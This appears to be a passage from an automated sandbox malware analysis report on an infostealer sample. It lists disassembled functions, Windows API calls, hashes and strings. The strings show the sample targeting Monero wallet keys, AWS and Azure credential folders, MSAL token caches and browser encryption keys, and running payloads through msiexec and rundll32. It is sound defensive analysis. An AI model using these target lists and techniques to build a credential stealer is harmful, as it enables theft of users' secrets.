                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 36f6d01f923ad77e1f2dae5d29fb19060655bf66d27383f7f3054c31393c8e62
                  • Instruction ID: e5d37f05e7247a4c617becaff2a770bb74c5affb23580c12880925f171f5c9e2
                  • Opcode Fuzzy Hash: 36f6d01f923ad77e1f2dae5d29fb19060655bf66d27383f7f3054c31393c8e62
                  • Instruction Fuzzy Hash: 68E13D71910109ABCB18EBA0EE96FEE7378BF54305F10416CF116A7091DE39BE45EB62
                  Function 00FBC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00C8D110,00000000,?,00FD144C,00000000,?,?), ref: 00FBCA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FBCA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00FBCA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FBCAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FBCAD9
                  • StrStrA.SHLWAPI(?,00C8D380,00FD0B52), ref: 00FBCAF7
                  • StrStrA.SHLWAPI(00000000,00C8D158), ref: 00FBCB1E
                  • StrStrA.SHLWAPI(?,00C8DC80,00000000,?,00FD1458,00000000,?,00000000,00000000,?,00C890F8,00000000,?,00FD1454,00000000,?), ref: 00FBCCA2
                  • StrStrA.SHLWAPI(00000000,00C8DC20), ref: 00FBCCB9
                    • Part of subcall function 00FBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                    • Part of subcall function 00FBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                  • StrStrA.SHLWAPI(?,00C8DC20,00000000,?,00FD145C,00000000,?,00000000,00C890B8), ref: 00FBCD5A
                  • StrStrA.SHLWAPI(00000000,00C891D8), ref: 00FBCD71
                    • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                    • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                    • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                  • lstrlen.KERNEL32(00000000), ref: 00FBCE44
                  • CloseHandle.KERNEL32(00000000), ref: 00FBCE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 4a426e9d8f9480b05e38e1c6c3f654b81e306a547a54e68a7b8f12d51543d395
                  • Instruction ID: a92b4db2048705f4be2293c1e12a687ed5d9295ce8b002cad8923ad5d5372d0b
                  • Opcode Fuzzy Hash: 4a426e9d8f9480b05e38e1c6c3f654b81e306a547a54e68a7b8f12d51543d395
                  • Instruction Fuzzy Hash: 34E1FB7190010DABDB18EBA0ED96FEEB778AF14304F40416DF10667191EF387A8ADB65
                  Function 00FC8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • RegOpenKeyExA.ADVAPI32(00000000,00C8B048,00000000,00020019,00000000,00FD05B6), ref: 00FC83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                  • wsprintfA.USER32 ref: 00FC8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                  • Instruction ID: 2d0839f1ac47048e90e41959b299d8701b6f9a1f6ef9b0de5b88adbc9148c2cd
                  • Opcode Fuzzy Hash: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                  • Instruction Fuzzy Hash: 4981297191011DABDB28DB50DD96FEAB7B8BF08704F00829DE10AA7180DF756E86DF90
                  Function 00FC4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00FC4DCD
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                    • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00FC4E59
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                    • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                    • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FC4EE5
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49B0
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD08D2), ref: 00FC49C5
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49E2
                    • Part of subcall function 00FC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FC4A1E
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00C8EA18), ref: 00FC4A4A
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FF8), ref: 00FC4A5C
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A70
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FFC), ref: 00FC4A82
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A96
                    • Part of subcall function 00FC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FC4AAC
                    • Part of subcall function 00FC4910: DeleteFileA.KERNEL32(?), ref: 00FC4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 4e4f9e8ac05995c67017c0f8dab0f94233d2ed8b8ab140c570ef5fe9c47fedff
                  • Instruction ID: a06b5194cb987a36f9b79701a890cc914734e96c7fd5c5b841d3afa1c044b8c6
                  • Opcode Fuzzy Hash: 4e4f9e8ac05995c67017c0f8dab0f94233d2ed8b8ab140c570ef5fe9c47fedff
                  • Instruction Fuzzy Hash: 1641D57A94020867D724F770EC47FED3738AB24704F044458B149A61C1EEF8ABC9AB93
                  Function 00FC9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FC906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                  • Instruction ID: 00f5102f3e764b9dbdea188c04960e34b79214f6fb693fecbd2e699a7174e1bc
                  • Opcode Fuzzy Hash: c54b3dde8ed9217351eed551a71ac5d2787b06a25da1d0a895712c40ce02fd7f
                  • Instruction Fuzzy Hash: 2D711075900209ABCB18DFE4ED89FEDB7B8BF48700F14811CF519A7284DB79A945DB60
                  Function 00FC2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                  • Instruction ID: 375b9023a76a356227f38f3f06603f758557a65a40eca00d8c1783ade78a543a
                  • Opcode Fuzzy Hash: 8016780d16bf68d3e6c3095108ad8a20efde23346f0c7f3f151311b5fb0b9352
                  • Instruction Fuzzy Hash: A312FB7180010D9BDB19EBA0DE93FEDB738AF14304F54415DE50666191EF387B4AEBA2
                  Function 00FC52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB6280: InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                    • Part of subcall function 00FB6280: StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6303
                    • Part of subcall function 00FB6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                    • Part of subcall function 00FB6280: HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
                    • Part of subcall function 00FB6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                    • Part of subcall function 00FB6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                  • lstrlen.KERNEL32(00000000), ref: 00FC532F
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                  • lstrlen.KERNEL32(00000000), ref: 00FC5383
                  • lstrlen.KERNEL32(00000000), ref: 00FC53AE
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 455ed202a1a5cf42c8c5aa1de5606a00d89505b2cf978ca056f8839c9832b709
                  • Instruction ID: 1713332b3ea25cc6a71ae414df05d6f002d17e966d9bd4d67eca6f0414adead0
                  • Opcode Fuzzy Hash: 455ed202a1a5cf42c8c5aa1de5606a00d89505b2cf978ca056f8839c9832b709
                  • Instruction Fuzzy Hash: 5351B77091014EABDB18EF60DE97FED7779AF50304F50402CE40A5A592EF387A46EB62
                  Function 00FC12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: fe00b27e1f5ec65b6911bce2e847649ad17e95aca3ae17912eaf7dbc6eb9bb6a
                  • Instruction ID: 6225ebc5c509eaa74d62fc8ece741f37cd16bf73d714f24912264886e90e9dc1
                  • Opcode Fuzzy Hash: fe00b27e1f5ec65b6911bce2e847649ad17e95aca3ae17912eaf7dbc6eb9bb6a
                  • Instruction Fuzzy Hash: 1AC1A6B590011E9BCB18EF60DD8AFEA7378BF54304F00459CE11E67181EA78EA95DF91
                  Function 00FC4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC42EC
                  • lstrcat.KERNEL32(?,00C8E2D8), ref: 00FC430B
                  • lstrcat.KERNEL32(?,?), ref: 00FC431F
                  • lstrcat.KERNEL32(?,00C8D2D8), ref: 00FC4333
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                    • Part of subcall function 00FB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC93C0: GlobalAlloc.KERNEL32(00000000,00FC43DD,00FC43DD), ref: 00FC93D3
                  • StrStrA.SHLWAPI(?,00C8E278), ref: 00FC43F3
                  • GlobalFree.KERNEL32(?), ref: 00FC4512
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                    • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                    • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC44A3
                  • StrCmpCA.SHLWAPI(?,00FD08D1), ref: 00FC44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00FC44E5
                  • lstrcat.KERNEL32(00000000,00FD0FB8), ref: 00FC44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
